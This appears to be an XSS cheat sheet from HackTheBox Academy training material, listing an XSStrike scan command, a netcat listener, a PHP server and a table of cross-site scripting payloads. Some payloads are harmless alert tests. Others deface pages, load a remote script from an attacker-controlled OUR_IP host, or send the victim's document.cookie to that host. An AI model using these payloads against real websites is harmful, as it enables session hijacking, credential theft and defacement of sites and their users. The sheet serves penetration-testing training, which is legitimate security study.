# XSS Cheat Sheet {% hint style="info" %} ### Commands {% endhint %} | **Commands** | | | ------------------------------------------------------------------- | --------------------------------- | | `python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"` | Run `xsstrike` on a url parameter | | `sudo nc -lvnp 80` | Start `netcat` listener | | `sudo php -S 0.0.0.0:80` | Start `PHP` server | | Code | Description | | --------------------------------------------------------------------------------------------- | ----------------------------- | | **XSS Payloads** | | | `` | Basic XSS Payload | | `` | Basic XSS Payload | | `<script>print()</script>` | Basic XSS Payload | | `<img src="" onerror=alert(window.origin)>` | HTML-based XSS Payload | | `<script>document.body.style.background = "#141d2b"</script>` | Change Background Color | | `<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>` | Change Background Image | | `<script>document.title = 'HackTheBox Academy'</script>` | Change Website Title | | `<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>` | Overwrite website's main body | | `<script>document.getElementById('urlform').remove();</script>` | Remove certain HTML element | | `<script src="http://OUR_IP/script.js"></script>` | Load remote script | | `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` | Send Cookie details to us |